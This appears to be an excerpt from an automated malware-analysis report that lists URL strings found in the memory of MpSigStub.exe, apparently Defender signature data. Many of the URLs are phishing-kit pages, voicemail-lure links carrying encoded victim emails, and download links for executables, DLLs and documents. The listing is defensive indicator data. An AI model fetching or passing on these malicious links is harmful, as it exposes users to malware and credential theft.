Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://simetrika.com/redirect/zg9uywxklmvhdmvzqgfjy2vsbgvudc5jb20=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: https://sinavtakvim.icu/zx/ag.doc
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://sis.ieadar.com.br-$r)r/Igreja-master/agendaSec/css/Sq4D0WfbvSitsO.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://smesalvado.sslblindado.com/d.doc
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://snowfall.top/eusetup.exe
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: https://specs2go.shawalzahid.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/Juliana.jpg
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/grdmody.jpg
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/msnGRD.jpg
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://static.wixstatic.com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://static.wixstatic.com/ugd/859f79_35181f339d694f87870220aa3da46c30.doc
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://stitch-statichosting-prod.s3.amazonaws.com/5ffbf74f106b1ff88367ac90/5ffbf62cd17b985f24b01f73
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://storage.googleapis.com/officexel/remittance%20invoice.zip
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://storagepinetown.co.za/1/14/?email=itsupport
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://stretchwrestle.com/ringcentral/wealth.php
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://subwaybookreview.com/vl1/sample.doc
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp String found in binary or memory: https://suggestor.pirrit.com/engine/getpopups.php
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: https://sundersls.weebly.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://supplementsizeup.co.uk/aa/ger/login.php
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: https://surustore.com/imageY9a
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://syr.us/gpn
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://t.co/ou2k0nuvi8)
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://t.me/File
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://tdgnaples.com/.howe
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://telegra.ph/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://ternerdrivew.at/3/wwf.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://ternerdrivew.at/3/wwf.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://thecloud-jewels.com/wp-content/themes/storefront/inc/admin/ms
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp String found in binary or memory: https://thiscannotpossiblywork.local/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://tiagogalindo.com.br/1/ksu/index.html
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://ticket.webstudiotechnology.com/sc/wp-includes/SimplePie/XML/Declaration/ytUsz4l0Qo.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://timbeck.net/redirect/ywxpbmeuc2vyymfulwjhcmj1qgrpbnvszwdhbc5ybw==
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/j7tx7h8)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/up77pck
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/y7rku84vscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/yaozbad7
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://tinyurl.com/yarknmzj
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: https://tiw0dspxozds.azurewebsites.net/fdoi
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: https://towingnow.ca/LvR2HWHdQ.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://trinitas.or.id/templates/jakarta/images/addons/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.cc/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.club/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.com/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.link/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.me/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://ttraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: https://tubestore.com.br/wp-content/p_bn/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://twitter.com/eduClient
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/e6b2i
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://u.nu/edc63
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://u6947877.ct.sendgrid.net/wf/click?upn=aum5tbbw0s-2boddc9wvl76ffmwkftnihk7jwmiyskchpxyq1lorjb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://uae-signs.com/wp-includes/SimplePie/Content/project1/PROJRCT-B.exe
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://uaeub.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: https://uis.public360online.com:443/biz/v2-pbr/docprod/templates/_uis%20moteinnkalling_referat.docx
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://uniquestyle.dk/wp-content/themes/ifeaturepro5-child/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://updatesdomainn.ml/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://updatesdomainn.ml/post.php
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: https://upload.cat/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://uploadvirus.com/uploads/
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp String found in binary or memory: https://upt.fastsearch.me/
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: https://upurl.me/vvkzd
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp String found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: https://uringvermi.at/3/zet.dll
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://urldefense.proofpoint.com/v2/url?u=http-3a__entreverodomoha.com.br_7_index.php-3f-3f-3fr-3fw
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: https://utilities.pcpitstop.com
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://vamoss.com.br/blogfolio/wp-content/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://vaqww.dyndns.dk/tolly5/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: https://vespang.cf/aggreey/post.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: https://victoriaparkmazda-my.sharepoint.com/personal/ann_victoriaparkmazda_co_uk/_layouts/15/guestac
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: https://vieeewen.org/ddy/next.php
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: https://vieeewen.org/tgg/next.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://viro.mleydier.fr/noauth
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://vm.jt-voicem.club/?e=ckoonce
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://vm.jt-voicem.club/?e=ljeffcoat
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: https://vmnames.ssvoipsx.xyz/?e=%25
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://vn.pr-nijim.xyz/?e=soumu
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://voice.vm-business.online/?e=jscott
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: https://voicemailss.hozoimn.xyz/?e=twfyawx5bi5kywvja2vslw1peebnyxjhdghvbkvszwn0cmljlmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://voipses.eononass.xyz/?e=%25
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp String found in binary or memory: https://voipss.snonames.xyz/?e=%25
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: https://vooydvclhlqukhdvrsxe.com/tx.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: https://voyya.com.mx/wp-content/themes/Divi/incl(
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: https://vp.videomeet.club/?e=
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: https://vr2oq.csb.app/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/4a8gk
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/ghqec
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: https://vsit.site/xndcx
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: https://vtsamples.commondatastorage.googleapis.com/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gcbs
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://wac.edgecastcdn.net/800952/5b595c13-aea5-4a6c-a099-d29c4678f6f2-api/gccs
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://wacochamber.com/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: https://wayphositu.info/nasm3m/chalo.php?id=154789
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp String found in binary or memory: https://we.tl/t-ccUfUrQOhF
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: https://webmailx.space/ml/ama/4/excel/log.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp String found in binary or memory: https://wordpress.greekstrading.com/wp-content/plugins/megamenu/integ%oS)IaGrati%oS)IaGon/twentyseve
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: https://world-wwt.com/wp-admin/css/colors/coffee/reportexcelnew.php
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: https://www-cdn.getwebcake.com/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: https://www.%s.com.br/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: https://www.4shared.com/download/pJhaizQgba/wd11.exe
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp String found in binary or memory: https://www.4shared.com/downloadhelper/stat?type=%STATYPE%xc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: https://www.4shared.com/web/directdownload/plcok719ce/hhnjnm.d9cc6b8210cf7f938818851
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.admos-gleitlager.de/feed/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.advokathuset.dk/auktioner/tvangsauktioner/saadan-koeber-du-paa-tvangsauktion
Source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp String found in binary or memory: https://www.aec.com.my/aec_5.5/public/ph/h/page.php
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp String found in binary or memory: https://www.africafooddistribution.com/wp-content/themes/topxoh/sloch/index.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: https://www.anca-aste.it/uploads/form/boeing_spe_leos_logo.jpg
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: https://www.anf.es/address/)1(0&
Source: MpSigStub.exe, 00000024.00000003.6250246107.0000019795224000.00000004.00000001.sdmp String found in binary or memory: https://www.apple.com/appleca/0
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: https://www.arm-mn.com/wp-content/themes/bb-theme/classes/msg.jpg
